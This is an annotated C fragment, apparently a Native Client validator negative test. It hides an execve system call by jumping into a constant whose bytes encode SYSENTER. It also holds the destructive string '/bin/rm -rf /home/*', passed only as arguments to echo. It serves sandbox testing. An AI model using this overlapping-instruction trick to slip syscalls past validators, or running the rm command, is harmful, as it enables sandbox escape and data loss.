2 * Copyright 2008 The Native Client Authors. All rights reserved.
3 * Use of this source code is governed by a BSD-style license that can be
4 * found in the LICENSE file.
// TrustMe: loads the registers for a Linux execve system call by hand and
// then jumps, through a pointer held in a local variable, to an address
// inside its own machine code (TrustMe + 9). No system-call instruction
// appears in the source text of this function.
//
// Why a sandbox validator has to reject this: a straight-line disassembly
// of the function reports only mov/jmp instructions, but the constant
// 0x0000340f is stored little-endian as the bytes 0f 34 00 00, and 0f 34 is
// the x86 SYSENTER opcode. An indirect jump into the middle of the
// instruction that carries that immediate executes bytes that were never
// reported as an instruction. The properties to check are therefore
// (a) every indirect branch target is constrained to a known instruction
// boundary and (b) no instruction can be entered at an interior byte.
// NOTE(review): presumably this file is a negative test for the Native
// Client validator -- confirm against the test harness that builds it.
//
// Parameters:
//   returnaddr1 - not referenced in the visible body; main passes -1.
//   path, argv, envp - never named in the body; they are read from fixed
//                      %esp offsets by the inline asm below.
// Returns: declared int, but no return statement appears in the visible
//          listing; control leaves through the indirect jmp.
11 int TrustMe(int returnaddr1,
12 const char *path, char *const argv[], char *const envp[]) {
// immx is not read anywhere in the visible body; its apparent purpose is to
// get the bytes of the constant emitted into the instruction stream.
13 int immx = 0x0000340f;
// The (int) cast of a function address assumes 32-bit pointers. The +9 is
// presumably the offset of immx's immediate inside the compiled function;
// that depends on the compiler's prologue and code generation -- TODO
// confirm with a disassembly of the actual build.
14 int codeaddr = (int)TrustMe + 9;
16 // This code creates the machine state for the execve call, with
17 // little regard for preserving the sanity of the rest of the stack.
// The %esp/%ebp displacements below are hard-coded for one specific stack
// frame layout, and these basic asm() statements declare no operands or
// clobbers, so the compiler is not told that eax/ebx/ecx/edx/ebp change.
18 asm("mov $11, %eax"); // set syscall # for execve
19 asm("mov 28(%esp), %ebx"); // linux kernel wants args in registers: arg1
20 asm("mov 32(%esp), %ecx"); // arg2
21 asm("mov 36(%esp), %edx"); // arg3
22 asm("mov %esp, %ebp"); // save esp in ebp
// Unmasked, memory-indirect jump: the target is whatever value sits at
// 12(%ebp), which the existing comment identifies as codeaddr.
23 asm("jmp *12(%ebp)"); // jump to overlapped instruction
24 // via address in local var codeaddr
// Argument vector that main hands to TrustMe. main passes eargv[0]
// ("/bin/echo") as the program path, so the remaining strings are only
// arguments to echo: if the execve goes through, the command line is
// printed, and /bin/rm is not the program being executed. Visible output
// therefore signals that the system call escaped the sandbox.
27 char *const eargv[] = {"/bin/echo", "/bin/rm", "-rf", "/home/*", NULL};
28 int main(int argc, char *argv[]) {
29 TrustMe(-1, eargv[0], eargv, NULL);